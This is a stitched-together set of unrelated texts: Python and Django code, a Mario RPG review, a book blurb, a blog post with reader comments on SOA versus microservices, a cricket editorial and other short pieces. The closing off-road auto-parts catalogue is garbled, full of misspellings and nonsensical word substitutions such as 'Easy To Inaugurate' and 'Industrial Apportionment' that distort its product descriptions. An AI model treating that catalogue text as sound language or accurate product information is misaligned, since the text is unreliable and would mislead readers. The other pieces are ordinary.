acc, prng = behave.acc.accuracy(ps, prng=prng)
assert np.allclose(np.sum(acc)/float(k), .5, atol=.05)
# dim check
assert ps.shape == acc.shape, "l off"
def test_behave_random():
prng = np.random.RandomState(SEED)
trials, acc, ps, prng = behave.behave.random(N=1, k=5, prng=prng)
# dim check
assert trials.shape == acc.shape, "l off: trials and acc"
assert trials.shape == ps.shape, "l off: trials and ps"
# Check trials comp, then ps and acc avg
k = 3000
trials, acc, ps, prng = behave.behave.random(N=1, k=k, prng=prng)
assert np.allclose(np.sum(trials), k), "k is off"
assert np.allclose(np.unique(trials), np.array([0, 1])), "N if off"
assert np.allclose(np.mean(ps[ps > 0.0]), .5, atol=.05), "Bad avg"
def test_behave_learn():
prng = np.random.RandomState(SEED)
trials, acc, ps, prng = behave.behave.learn(N=1, k=5, prng=prng)
# dim check
assert trials.shape == acc.shape, "l off: trials and acc"
assert trials.shape == ps.shape, "l off: trials and ps"
# Check trials comp, then ps and acc avg
k = 3000
trials, acc, ps, prng = behave.behave.learn(N=1, k=k, prng=prng)
assert np.allclose(np.sum(trials), k), "k is off"
assert np.allclose(np.unique(trials), np.array([0, 1])), "N if off"
assert np.mean(ps[ps > 0.0]) > .5, "Bad avg"
|
Mario, Luigi and Bowser team up for a big adventure.
Now they’re words we wouldn’t have thought we’d type, unless we hadn’t played Mario & Luigi: Superstar Saga on the Game Boy Advance back in 2003.
For once, the big green spiky mean dude isn’t the antagonist here, but it’s only because it suits him. You see, Cackletta has stolen Princess Peach’s voice, replacing it with explosives. Yep – she speaks, she drops word bombs. Real bombs. Bowser doesn’t want to kidnap her in this state, as her language may damage his lovely, lava-filled castle.
So, they join forces and head off after Cackletta and her henchthing, Fawful, to rescue Peach’s voice. This means visiting the neighbouring Beanbean Kingdom (which is, of course, right next to the Isis kingdom...) Will the Beanbeans help our intrepid heroes (and Bowser)? Or will they become has-beans?
It’s a big old turn-based RPG thing, but with massive smatterings of Mario lore that make it less po-faced. It’s also quite funny at times. From simple jumping upon the bonces of enemies to going full whirlwind right through them, you level up, get more powerful – you know the drill.
Then there’s the bonus game which unlocks once you’re a reasonable way into the main adventure. Running alongside the main story (but optional), Minion’s Quest: The Search for Bowser sees the Goombas trying to track down their boss and rescue him. Rocking a sort of Fire Emblem vibe, you equip units and go for baddie takedown.
|
# -*-coding: utf-8-*-
from sqlalchemy import (
Column,
Integer,
Date,
Numeric,
String,
Table,
ForeignKey,
)
from sqlalchemy.orm import relationship, backref
from ..models import (
DBSession,
Base
)
outgoing_cashflow = Table(
'outgoing_cashflow',
Base.metadata,
Column(
'outgoing_id',
Integer,
ForeignKey(
'outgoing.id',
ondelete='restrict',
onupdate='cascade',
name='fk_outgoing_id_outgoing_cashflow',
),
primary_key=True,
),
Column(
'cashflow_id',
Integer,
ForeignKey(
'cashflow.id',
ondelete='restrict',
onupdate='cascade',
name='fk_cashflow_id_outgoing_cashflow',
),
primary_key=True,
)
)
class Outgoing(Base):
__tablename__ = 'outgoing'
id = Column(
Integer,
autoincrement=True,
primary_key=True
)
date = Column(
Date,
nullable=False,
)
resource_id = Column(
Integer,
ForeignKey(
'resource.id',
name="fk_resource_id_outgoing",
ondelete='restrict',
onupdate='cascade',
),
nullable=False,
)
account_item_id = Column(
Integer,
ForeignKey(
'account_item.id',
name="fk_account_item_id_outgoing",
ondelete='restrict',
onupdate='cascade',
),
nullable=False,
)
subaccount_id = Column(
Integer,
ForeignKey(
'subaccount.id',
name="fk_subaccount_id_outgoing",
ondelete='restrict',
onupdate='cascade',
),
nullable=False,
)
sum = Column(
Numeric(16, 2),
nullable=False,
)
descr = Column(
String(length=255),
)
resource = relationship(
'Resource',
backref=backref(
'outgoing',
uselist=False,
cascade="all,delete"
),
foreign_keys=[resource_id],
cascade="all,delete",
uselist=False,
)
account_item = relationship(
'AccountItem',
backref=backref(
'outgoings',
uselist=True,
lazy="dynamic"
),
uselist=False,
)
subaccount = relationship(
'Subaccount',
backref=backref(
'outgoings',
uselist=True,
lazy="dynamic"
),
uselist=False,
)
cashflows = relationship(
'Cashflow',
secondary=outgoing_cashflow,
backref=backref(
'outgoing',
uselist=False,
),
cascade="all,delete",
uselist=True,
)
@classmethod
def get(cls, id):
if id is None:
return None
return DBSession.query(cls).get(id)
@classmethod
def by_resource_id(cls, resource_id):
if resource_id is None:
return None
return (
DBSession.query(cls).filter(cls.resource_id == resource_id).first()
)
def rollback(self):
cashflows = list(self.cashflows)
self.cashflows = []
DBSession.flush()
for cashflow in cashflows:
DBSession.delete(cashflow)
|
Avery Bloom, who 's bookish, intense, and afraid of many things, particularly deep water, lives in New York City. Bett Devlin, who 's fearless, outgoing, and loves all animals as well as the ocean, lives in California. What they have in common is that they are both twelve years old, and are both being raised by single, gay dads. When their dads fall in love, Bett and Avery are sent, against their will, to the same sleepaway camp. Their dads hope that they will find common ground and become friends --and possibly, one day, even sisters. But things soon go off the rails for the girls (and for their dads too), and they find themselves on a summer adventure that neither of them could have predicted.
|
# Copyright 2021 The CLU Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MetricWriter for writing to TF summary files.
Only works in eager mode. Does not work for Pytorch code, please use
TorchTensorboardWriter instead.
"""
from typing import Any, Mapping, Optional
from clu.internal import utils
from clu.metric_writers import interface
import tensorflow as tf
from tensorboard.plugins.hparams import api as hparams_api
Array = interface.Array
Scalar = interface.Scalar
class SummaryWriter(interface.MetricWriter):
"""MetricWriter that writes TF summary files."""
def __init__(self, logdir: str):
super().__init__()
self._summary_writer = tf.summary.create_file_writer(logdir)
def write_scalars(self, step: int, scalars: Mapping[str, Scalar]):
with self._summary_writer.as_default():
for key, value in scalars.items():
tf.summary.scalar(key, value, step=step)
def write_images(self, step: int, images: Mapping[str, Array]):
with self._summary_writer.as_default():
for key, value in images.items():
tf.summary.image(key, value, step=step, max_outputs=value.shape[0])
def write_texts(self, step: int, texts: Mapping[str, str]):
with self._summary_writer.as_default():
for key, value in texts.items():
tf.summary.text(key, value, step=step)
def write_histograms(self,
step: int,
arrays: Mapping[str, Array],
num_buckets: Optional[Mapping[str, int]] = None):
with self._summary_writer.as_default():
for key, value in arrays.items():
buckets = None if num_buckets is None else num_buckets.get(key)
tf.summary.histogram(key, value, step=step, buckets=buckets)
def write_hparams(self, hparams: Mapping[str, Any]):
with self._summary_writer.as_default():
hparams_api.hparams(dict(utils.flatten_dict(hparams)))
def flush(self):
self._summary_writer.flush()
def close(self):
self._summary_writer.close()
|
This is unsurprising, because it’s rooted in fact. For all of its other faults, SOA was a vision of enterprises that looks remarkably like what progressive organizations are building today with cloud native architectures composed of, among other things, microservices. Stripped to its core, SOA was the idea that architectures should be composed of services rather than monolithic applications.
Popular as that vision is today, however, SOA was from the start an uphill battle. It gained hype and currency, which in turn led inevitably to furious messaging and branding pivots, but even in an industry which tends towards the ephemeral SOA’s moment in the sun by the standards of technologies that preceded it comparatively brief.
If SOA and microservices have at least some common ground from a functional perspective, then, why was the former rejected and the latter embraced?
Many would point to size as the critical differentiator. Services as described by SOA were insufficiently granular, it’s been argued, and therefore difficult to build and harder to manage. Setting aside the obvious fact that this glosses over the management overhead associated with taking large services and breaking them up into large numbers of smaller alternatives, it also misses the far more critical distinction: SOA was primarily a vendor led phenomenon, microservices is by contrast largely being driven from the bottom up.
Given the success of platforms such as AWS, it’s difficult to make the argument that service driven platforms are not an effective way of building platforms that scale or that they’re not the dominant approach at present. But notably, service-based platforms are generally developer constructs at present. The SOA-driven world originally envisioned by large vendors, one in which services were built out upon a byzantine framework of complex (and frequently political) “standards” never came to pass for the simple reason that developers wanted no part of it.
To be sure, microservices has benefitted from the lessons learned by various SOA practitioners, and indeed the effort to popularize and socialize the latter term has simplified the adoption of the former. But the most important takeaway from SOA was arguably that developers would play a decisive – and in many cases, deciding – role on what would get used and what would not. Microservices are easier for them to develop than monolithic alternatives, and come without the vendor standards baggage of SOA, which is why even if it’s still outpaced by SOA on a volume basis its trajectory looks a lot more positive.
Too often in this industry we look for explanations for success or failure based on technology or function, while the real causative factors for success or failure are much simpler: do those would make kings want to use it, or not?
IMHO, microservices is subset of SOA.
SOA intent is to provide reusable services for service consumers. From service consumer perspective microservice looks exactly the same way.
So, microservice is fine grained SOA with ability of independent (well.. more independent) deployment and scalability of particular services. Over time that approach yielded big amount of toolsets, framework, approaches and practices, but conceptually microservice is still SOA.
Good article. So as for me one of the main issues in SOA is that it is build to serve enterprise. So if you want to make SOA you need to use some vendors SOA suites, like Oracle, etc. In microservices you can take various things put them here and there and it will work. For real SOA (SOA 2.0) it is more likely you will spend 2-3 weeks on setup ESB, and some other things around. Unlikely microservices allows you to skip some requirements and restrictions that should be guaranteed in SOA as SLA. So I would say that microservices is a very light version of SOA with various things that can be skiped by developers or ignored.
Hadn’t realised this before but as soon as I read the title I realised ithe truth of it.
Though I’d like to suggest that advances in simplicity of deployment and management which the cloud has brought as played a significant role in the adoption of microservices. In the past spinning up a new “node” was a laborious task – with vendor lockin as you point out – so developers were forced into building monoliths. Now that barrier has been removed, it has enabled the microservice to become viable.
The forward SOA thinkers I worked with long ago thought in terms of primitives, not SOA-enabled APIs of enterprise apps.
SAP consultants have made a 10 year career out of simplifying SOA-enabled functions in SAP ERP.
I agree with you of the benefits of this being adopted by developers rather than application vendors.
I believe that problem with traditional SOA was the roadmap fron ideation to industry implementation, bad innovation management, I believe nowaday the change management is more madure that 10 year ago, the standars as SOA- RA, and the implementation and commercialization of IBM, Oracle, inclusive service level WSO2 had found a resistence in organizational changing management. It not is happening with microservices because is lightweight and agile.
I totally agree. I think the view on developers and their importance for the company success changed massively over the last years, which is really great thing for everybody.
the current trend of microservices as shown in your graph very closely matches the left hand side of the SOA hype curve. I guess time will tell in terms of when this hype curve flattens out and then plummets.
Hi Stephen, thank your for this article. In general I agree with your vision but, honestly, I never seen any contradiction in viewing microservices as an evolution of SOA. Indeed, I think that such an idea is not completely wrong. If we just take into consideration the main principles which govern service oriented computing, there are no so many differences between SOA and Microservices.
The real difference, as you point out, is that you can program microservices but you can only design SOA. This is a very big difference from an engineering point of view and this is the reason why microservices were born from the bottom and SOA are governed from the top.
But the main point here is that both of them are exploiting the service oriented paradigm. So where is the real difference? In my personal opinion the main difference between them is the cloud computing: the computational support. When SOA were conceived, cloud computing did not actually exist. They were born for integrating systems which was a need for those companies which had to deal with complex systems populated by several vertical applications. This was the ground of SOA. Now, there is the cloud which is the new ground for service oriented applications. Computational resources are easy to access and the service oriented paradigm is shifting to microservices. Instead of limiting the usage of services by designing system integration flows you can directly program applications using microservices. As you said, it is easier to develop a microservice than following all the SOA rules and developing a Web service or an orchestrator. Try to imagine this: take a DeLorean and go back at the beginning of 2000 when SOA was born. Are you so sure that introducing a microservice approach at that time was so feasible? Even if it was possibile in specific cases, there were not a solid ground where they could grow. Today you have this natural ground in the cloud. This is why they become so popular I think.
As in an Isaac Asimov novel, SOA just represent “Robbie”, the first robot 🙂 and microservices the next evoluted version!
Thanks for the article. I’d like to dive a bit deeper into your graphs. Can you tell me how you created the set of points used in the graphs. I’m not able to reproduce your results, but I’m sure it’s my naïve use of Google Trends.
@Don: Nothing fancy. Queried Google Trends for each term, maximized the timeline and downloaded the results as a CSV.
|
from django.db.models import Aggregate, Func
import six
class DateTrunc(Func):
"""
Accepts a single timestamp field or expression and returns that timestamp
truncated to the specified *precision*. This is useful for investigating
time series.
The *precision* named parameter can take:
* microseconds
* milliseconds
* second
* minute
* hour
* day
* week
* month
* quarter
* year
* decade
* century
* millennium
Usage example::
checkin = Checkin.objects.
annotate(day=DateTrunc('logged_at', 'day'),
hour=DateTrunc('logged_at', 'hour')).
get(pk=1)
assert checkin.logged_at == datetime(2015, 11, 1, 10, 45, 0)
assert checkin.day == datetime(2015, 11, 1, 0, 0, 0)
assert checkin.hour == datetime(2015, 11, 1, 10, 0, 0)
"""
function = "DATE_TRUNC"
template = "%(function)s('%(precision)s', %(expressions)s)"
def __init__(self, expression, precision, **extra):
if six.PY2:
super(DateTrunc, self).__init__(expression, precision=precision, **extra)
else:
super().__init__(expression, precision=precision, **extra)
class Extract(Func):
"""
Accepts a single timestamp or interval field or expression and returns
the specified *subfield* of that expression. This is useful for grouping
data.
The *subfield* named parameter can take:
* century
* day
* decade
* dow (day of week)
* doy (day of year)
* epoch (seconds since 1970-01-01 00:00:00 UTC)
* hour
* isodow
* isodoy
* isoyear
* microseconds
* millennium
* milliseconds
* minute
* month
* quarter
* second
* timezone
* timezone_hour
* timezone_minute
* week
* year
See `the Postgres documentation`_ for details about the subfields.
Usage example::
checkin = Checkin.objects.
annotate(day=Extract('logged_at', 'day'),
minute=Extract('logged_at', 'minute'),
quarter=Extract('logged_at', 'quarter')).
get(pk=1)
assert checkin.logged_at == datetime(2015, 11, 1, 10, 45, 0)
assert checkin.day == 1
assert checkin.minute == 45
assert checkin.quarter == 4
.. _the Postgres documentation: http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT
"""
function = 'EXTRACT'
name = 'extract'
template = "%(function)s(%(subfield)s FROM %(expressions)s)"
def __init__(self, expression, subfield, **extra):
if six.PY2:
super(Extract, self).__init__(expression, subfield=subfield, **extra)
else:
super().__init__(expression, subfield=subfield, **extra)
|
MBOX attachment extractor software is specially designed to extract all attachments from MBOX files. The tool also allows to remove MBOX file attachments which is beneficial to avoid the MBOX file corruption related issues. This MBOX attachment extractor supports various types of MBOX files successfully, exported from Mozilla Thunderbird, Mac Mail, SeaMonkey, Google Takeout, etc. One of the best feature of this product is that it gives permission to save extracted attachments at any desired location of your computer.MBOX attachment extractor software preserves all email items while extracting email messages from MBOX files and it comes with free demo edition which is helpful to evaluate the software. This software offers dual options to choose MBOX files as well as folder having MBOX files so that users can easily extract attachments from bulk MBOX files at once. MBOX attachment extractor is compatible with every 32 bit and 64 bit Windows Operating System. It is two is one software which extract all attachments from MBOX files and remove MBOX file attachments also.
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
from django.http import JsonResponse
from django.http import HttpResponseRedirect
from django.http import HttpResponse
from django.shortcuts import render
from django.views.decorators import csrf
# from django.contrib.auth.decorators import login_required
from tool.tools import createId
from reader.models import reader
from author.models import author
# connect to mysql and check
def loginReader(request):
lastUrl = ""
if "lastUrl" in request.POST:
lastUrl = request.POST['lastUrl']
context = {}
if "readerId" in request.session:
context['status'] = "success"
if lastUrl == "null":
# context['message'] = "/reader/readerIndex/"
return HttpResponseRedirect("/reader/index/")
elif lastUrl == "" or lastUrl is None:
context['status'] = "fail"
context['message'] = "錯誤的訪問"
return JsonResponse(context)
else:
# context['message'] = lastUrl
return HttpResponseRedirect(lastUrl)
# return JsonResponse(context)
if 'userName' not in request.POST and 'passwd' not in request.POST :
context['status'] = "fail"
context['message'] = "請重載後輸入 Email 和密碼"
return JsonResponse(context)
# return render(request, 'reader/login.html')
userName = unicode(request.POST['userName'])
passwd = createId(96,request.POST['passwd'])
try:
readerObj = reader.objects.get(email=userName)
if passwd != readerObj.passwd:
context['status'] = "fail"
context['message'] = "密碼錯誤!請重新登錄!"
return JsonResponse(context)
# return render(request, 'reader/loginFail.html', {'message': u'密碼錯誤!請重新登錄!'})
if readerObj.status == "allowed":
request.session["readerId"] = readerObj.id
request.session["userName"] = readerObj.name
# check user is or not author and author's status
isAuthor = author.isExist(readerObj.id)
request.session["isAuthor"] = isAuthor
authorStatus = author.getStatus(readerObj.id)
if not isAuthor:
request.session["authorStatus"] = ""
context['status'] = "success"
if lastUrl == "null":
context['message'] = "/reader/index/"
else:
context['message'] = lastUrl
return JsonResponse(context)
authorId = author.getId(readerObj.id)
if authorId != "":
request.session["authorId"] = authorId
if authorStatus == "active":
request.session["authorStatus"] = "active"
else:
request.session["authorStatus"] = authorStatus
context['status'] = "success"
if lastUrl == "null":
context['message'] = "/reader/index/"
else:
context['message'] = lastUrl
return JsonResponse(context)
elif readerObj.status == "abuse":
context['status'] = "fail"
context['message'] = "您尚未驗證郵箱!請前往注冊郵箱驗證身份!"
return JsonResponse(context)
else :
context['status'] = "fail"
context['message'] = '您的帳號狀態異常,無法登錄,目前狀態爲:' + str(readerObj.status) + '請聯繫管理員或重新註冊。'
return JsonResponse(context)
except reader.DoesNotExist:
context['status'] = "fail"
context['message'] = '用戶不存在!請重新登錄!'
return JsonResponse(context)
def logout(request):
# delete session
if "readerId" in request.session:
del request.session["readerId"] # if not exists, report error
del request.session["userName"] # if not exists, report error
del request.session["isAuthor"] # if not exists, report error
if 'authorId' in request.session:
del request.session["authorId"] # if not exists, report error
del request.session["authorStatus"] # if not exists, report error
request.session.flush()
return HttpResponseRedirect('/reader/login/')
else:
return HttpResponseRedirect('/reader/login/')
|
The Customer Support Center is within the Department of Facilities and Administrative Services.
You may also submit an online work order to report the issue.
In the event of an emergency, please contact extension 2353 during the time periods identified above. For all other times, the call should be directed to Campus Police at extension 2167.
|
import csv
class SimpleGraph:
def __init__(self):
self._spo = {}
self._pos = {}
self._osp = {}
def add(self, (sub, pred, obj)):
"""
Adds a triple to the graph.
"""
self._addToIndex(self._spo, sub, pred, obj)
self._addToIndex(self._pos, pred, obj, sub)
self._addToIndex(self._osp, obj, sub, pred)
def _addToIndex(self, index, a, b, c):
"""
Adds a triple to a specified index.
"""
if a not in index: index[a] = {b:set([c])}
else:
if b not in index[a]: index[a][b] = set([c])
else: index[a][b].add(c)
def remove(self, (sub, pred, obj)):
"""
Remove a triple pattern from the graph.
"""
triples = list(self.triples((sub, pred, obj)))
for (delSub, delPred, delObj) in triples:
self._removeFromIndex(self._spo, delSub, delPred, delObj)
self._removeFromIndex(self._pos, delPred, delObj, delSub)
self._removeFromIndex(self._osp, delObj, delSub, delPred)
def _removeFromIndex(self, index, a, b, c):
"""
Removes a triple from an index and clears up empty indermediate structures.
"""
try:
bs = index[a]
cset = bs[b]
cset.remove(c)
if len(cset) == 0: del bs[b]
if len(bs) == 0: del index[a]
# KeyErrors occur if a term was missing, which means that it wasn't a valid delete:
except KeyError:
pass
def triples(self, (sub, pred, obj)):
"""
Generator over the triple store.
Returns triples that match the given triple pattern.
"""
# check which terms are present in order to use the correct index:
try:
if sub != None:
if pred != None:
# sub pred obj
if obj != None:
if obj in self._spo[sub][pred]: yield (sub, pred, obj)
# sub pred None
else:
for retObj in self._spo[sub][pred]: yield (sub, pred, retObj)
else:
# sub None obj
if obj != None:
for retPred in self._osp[obj][sub]: yield (sub, retPred, obj)
# sub None None
else:
for retPred, objSet in self._spo[sub].items():
for retObj in objSet:
yield (sub, retPred, retObj)
else:
if pred != None:
# None pred obj
if obj != None:
for retSub in self._pos[pred][obj]:
yield (retSub, pred, obj)
# None pred None
else:
for retObj, subSet in self._pos[pred].items():
for retSub in subSet:
yield (retSub, pred, retObj)
else:
# None None obj
if obj != None:
for retSub, predSet in self._osp[obj].items():
for retPred in predSet:
yield (retSub, retPred, obj)
# None None None
else:
for retSub, predSet in self._spo.items():
for retPred, objSet in predSet.items():
for retObj in objSet:
yield (retSub, retPred, retObj)
# KeyErrors occur if a query term wasn't in the index, so we yield nothing:
except KeyError:
pass
def value(self, sub=None, pred=None, obj=None):
for retSub, retPred, retObj in self.triples((sub, pred, obj)):
if sub is None: return retSub
if pred is None: return retPred
if obj is None: return retObj
break
return None
def load(self, filename):
f = open(filename, "rb")
reader = csv.reader(f)
for sub, pred, obj in reader:
sub = unicode(sub, "UTF-8")
pred = unicode(pred, "UTF-8")
obj = unicode(obj, "UTF-8")
self.add((sub, pred, obj))
f.close()
def save(self, filename):
f = open(filename, "wb")
writer = csv.writer(f)
for sub, pred, obj in self.triples((None, None, None)):
writer.writerow([sub.encode("UTF-8"), pred.encode("UTF-8"), obj.encode("UTF-8")])
f.close()
if __name__ == "__main__":
g = SimpleGraph()
g.add(("blade_runner", "name", "Blade Runner"))
g.add(("blade_runner", "name", "Blade Runner"))
g.add(("blade_runner", "release_date", "June 25, 1982"))
g.add(("blade_runner", "directed_by", "Ridley Scott"))
print list(g.triples((None, None, None)))
print list(g.triples(("blade_runner", None, None)))
print list(g.triples(("blade_runner", "name", None)))
print list(g.triples(("blade_runner", "name", "Blade Runner")))
print list(g.triples(("blade_runner", None, "Blade Runner")))
print list(g.triples((None, "name", "Blade Runner")))
print list(g.triples((None, None, "Blade Runner")))
print list(g.triples(("foo", "name", "Blade Runner")))
print list(g.triples(("blade_runner", "foo", "Blade Runner")))
print list(g.triples(("blade_runner", "name", "foo")))
|
Celebrated rivalries in cricket revolve, in the popular mind, around the Ashes or contests involving India and Pakistan. Both duels have the weight of history and are replete with anecdotes. But as Steve Smith’s men play and train under the Mumbai sun in their build-up to the four-match Test series at Pune, Bengaluru, Ranchi and Dharamsala, it is time to acknowledge the particular intensity that marks games involving India and Australia. It is a rivalry inferior to none, the folklore further amplified by riveting contests, especially in India. Be it at Kolkata’s Eden Gardens in 2001 when V.V.S. Laxman’s 281 helped India stage one of cricket’s most remarkable fight-backs, or at Chennai’s Chepauk back in 1986, when India and Australia played out only the second tie in cricketing history since 1877, the contests have ticked all the boxes: mighty individual performances, oscillating fortunes and a fifth-day cracker. When rival skippers Virat Kohli and Smith walk out for the toss at Pune’s Maharashtra Cricket Association Stadium on February 23, they will take this legacy forward. Helmed by young men — Kohli is 28, Smith 27 — both the Indian and Australian teams are emerging from the struggles of transition; this series is their big chance at asserting greatness.
India at home is a daunting opposition, the ‘Final Frontier’ for Australia as Steve Waugh called it. The home team is in fine form, with emphatic victories against visiting teams over the last year, South Africa, New Zealand, England and Bangladesh. In its last 19 Tests, both home and away, India has remained undefeated, winning 15 of them. It is a validation of the squad’s evolution underpinned by the consistency of its two leading players, Kohli and off-spinner R. Ashwin, and augmented with others rising to the opportunity when it’s come — as Karun Nair did with his unbeaten 303 in the Chennai Test against England last December. A resolute captain and a calm coach, in Anil Kumble, have astutely guided the team. The odds favour India, and so does history. When Australia last toured India in 2012-13, it lost all four Tests. This season too, on balance, India appears to hold the aces. Australia may come in with a 3-0 triumph in home Tests against Pakistan, but before that while hosting South Africa it emerged second-best, and lost three Tests in Sri Lanka. The last of these has evoked concern about the team’s adaptability to subcontinental conditions. Much will hinge on Smith, his aggressive opener David Warner and left-arm fast bowler Mitchell Starc, while Nathan Lyon is expected to shepherd an under-cooked spin unit. In 1986, Allan Border arrived with a bunch that was written off; yet they left with one tie and a drawn series. As history shows, surprise is the second skin of tussles involving India and Australia.
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.core.validators
def remove_stale_content_types(apps, schema_editor):
# Remove known stale objects from django_content_type table.
ContentType = apps.get_model("contenttypes", "ContentType")
models = {
("auth", "message"),
("dashboard_app", "launchpadbug"),
("dashboard_app", "imagecharttestrun"),
("dashboard_app", "testingeffort"),
("dashboard_app", "imageattribute")
}
for model in models:
try:
ContentType.objects.get(app_label=model[0],
model=model[1]).delete()
except ContentType.DoesNotExist:
pass
def reverse_func(apps, schema_editor):
# Content types are automatically added by django.
pass
class Migration(migrations.Migration):
dependencies = [
('dashboard_app', '0014_auto_20150212_0604'),
]
operations = [
migrations.RunPython(
remove_stale_content_types,
reverse_func
),
]
|
Lightforce Driving Light Harness - 24 Volt Relay, Fuse, Switch, & Terminals.
Msd Zero-crossed Professional Racing Distributor.
Whether It's The Standard Rear Jeep Seats, Low-back Bucket Sats, Or The Versatile Fold-&-tumble Option For Additional Storage Spqce, Smittybilt Jeep Rear Seats Deliver The Same Lasting Comfort, Style, And Longevity That You've Ckme To Expect In All Smittybilt Products.
Beam' sIndustries Inc Retractable Lap Seat Belt By Beam's F0721-63773.
Keep Yourself Snug And Safe While Driving Or Trail Riding With These Quality Replacement Seat Belts. fI Your Seat Belts Are Worn, Frayed Or Damaged, They Cannot Supply Adequate Protection Concerning You Or Your Family. Our Seat Betls Meet Current Federal Motor Vehivle Safety Standards (fmvss). All Belts Include Mounting Hardware. Each Sold Separately. Also Available In Black(01), Tan(04), Blue(05) And Gray(09).
Garage/shop Organizer Oil Bottle Holder.
Go Rhino Garage Organization Products Hold A Variety Of Garage Storage Shelves And Racks. Easy To Inaugurate And Built With The High Quality, High Standards You Demand For Your Shop, Garage Or Enclosed Trailer At An Affordable Price!
Edelbrock Performer 440 Intake Manifold.
Edelbrock Performer Rpm Air-gap Dual Quad 350 C.i.d Crate Engine 9.0:2.
Bully Dog Triple Dog Gt Diesel Gauge Tuner 40420.
The Triple Dog Gt Is An Allin One Downloader, Monitor And Tuning Device. The Gt Diesel Features Multiple Power Settings With The Ability To Adjust Drivetrain And User Settings. In Aedition, The Gt Line Features All Of The Same Gauge/monitoring Functions As Well As The Advanced Driving Coach Softwwre Aiding Drivers In Maximizing Their Fuel Economy.
Super Swamper Tsl Vampire Tire.
The Vampire Steps Away From All Other Atv Tires. The Super Swamper Tsl/vampire Is As Rugged As Tney Come. The Deep Lugs Give Longer Trsad Life With The 43/32nds Of Cover Depth And Unsurpassed Forward, eRverse And Lateral Traction. The Vampires Are So Strong They Continue To Run Under Most Load Conditions Even While Punctured. As Long A sThe Vampire Does Not Become Unseated From The Rim The Tire Will Almost Always Get You Back. . . Even Without Air.
Kargo Master Top Mountain Brackets By Kargo Master 5072-1.
Safari Series Torture Mounting Brackets. Required For Mounting Safari Racks To Vehicke. Fits Factory Fiberglass Hardtops Only. Brackets May Be Left On Top If Rack Is Removed.
Supelift 4 - 5 In. F.i.t. System With Bilstein Shocks.
Mean Green Mean Green High-outpu tAlternator 140 Amp Mg7128.
For Use With A 6 Cylinder Engine. This Alternator Is A Heavy-duty, Eminently Output Alternator Producing 140 Amps. Mean Green's Alternator Is The Perfect Complement For Dual Batteries. Inside, There's A State-of-the-art Voltage Regulator Designed To Protect Wiring And Ignition Systems. Made In The Usa; This High Output Alternator Has A One Year Unconditional Guaranty. If It Fails, Mean Green Will Replace It.
Procomp Suspension 8 Inch Stage Ij Lift Kid With Ed9000 Shocks K4155b.
Pro Comp Is Driven By Genuine Off Road Enthusiasts. Pro Comp Suspension Products Reflect Customer-driven, Racing Influenced Technology And Engineering With A Focus Steady World-class Manufacturing Processes And Techniques. Wyen It Comes To Your Vehicle's Handling, Look And Performance, We Know You Don't Proceed Compromises And Either Do We. From The Moddle Of Downtown To The Middle Of Nowhere Pro Comp Will Get You There And Back.
Warn Ste3ring Bkx Skid Plate.
Warn's Steering Box Skid Plate Has A Tight, Full Enclosure, Design. 1/4 Clearance Between The Skid Plate And Steering Box Keeps Excellent Soil Clearance From The Big Rocks. It Also Means Full Structural Rigidity When The Rocks Hit. Large Holes Allow For Debris Clearance Without Sacrificing Structural Support. Made From 3/16 Steel And Black Powder Coated. Fits 1997-2006 Jeep Tj Including Rubicon.
Magnaflow Direct Fit California Obdii Catalytic Converter.
Magnaflow Direct-fit Catalytic Converters By Car Sound Are Designed According to Easy Bolt-on Installation For The Professional Installer. Each Is Designed To Exact The Original Equipment Specifications. While The Majority Of The Direct-fit Catalytic Converter Procucts Do Not Require Welding, Cutting Or Bending,_Limited Applications May Require Additiona Welding For Optimal Installation. These Converters Are Designed To Meet All Of California's Strict Emissions Codes.
When Access Is The Iss8e, Choose The Genesis Hinged Tonneau From Lund. With A Hinged Comprehend To Alliw Complete And Easy Access To Your Truck Bed, The Genesis Hinged Tonneau Has Heavy-duty Gas Struts Fod Quick, One-hand Opening And A Unique, Slam-n-scra Latch That Provides Instant Latching When Closing The Cover. Pre-marked Rails And Heavy-duty Clamps Ensure Quick, No-drill Installation.
Eelbrock C-26 Dual-quad Intake Manifold.
Maxxis Tires Maxxis Razr 4-speed Radial Tire M166425.
The Razr 4 Is The Perfect Tire For Utility Quad Rider Looking Conducive to More Performance. Featuring An Aggressive Tread Pattern Based On That Of The Legendary Razr And Radial Construction This Tire Offers Both Performance And Comfort. And Its Ljghtweight Design Reduces Steering Effort Allowing For Quick Handling When You Need It.
Viair Stainless Steel Leader Hose W/ Reprove Valve.
Leader Hoses Allow Hot Air From Compressors To Cool While Being Delivered To A Tire Oe Air Tank. Hoses With Check Valves Help To Defend The Head Of The Compressor From Damaging High Pfessure Starting.
Warn Series 9 Round Top Industrial Winch.
Warn Industries' Industrial Apportionment Has Intrroduced Its New Series 9 Round Top Hydraulic Winch, Which Has 9,000lb Pulling Capacity. This Winch Also Features A 5. 0 Cubic-inch Motor, And An Air-operatted Grasp For Convenient Free-spooling Of The Winch De~ate. What Makes This Winch Unique Is The Wear Strips/skid Plate Located On The Top Of The Unit, Which Protects It From Damage When Pulling A Vehicle Over The Top Of Winch. The Winch Is Equi0ped With A Heavy-duty Automatic Disc Brake For Safe, Dependablee Operation; And A Hardened-steel, Two-stage Planetary Geartrain For Faster Line Speeds.
Edge Juice W/attitude Plug-in Module/in-cab Controller.
Edge␙s Premier Product Line, The Juice With Attitude Controls Timing And Duration Of Injector Firing For Your Truck To Deliver Maximum Prformance, Improved Driveability And Better Fuel Economy. Get On-the-fly Adjustability And Monitoeing Capabilities At Your Fingertips. This Plug-in Module Is Easy To Install Ad Comes With Factory Style Connections.
Olympic 4x4 Products Double Side Bars 271-175.
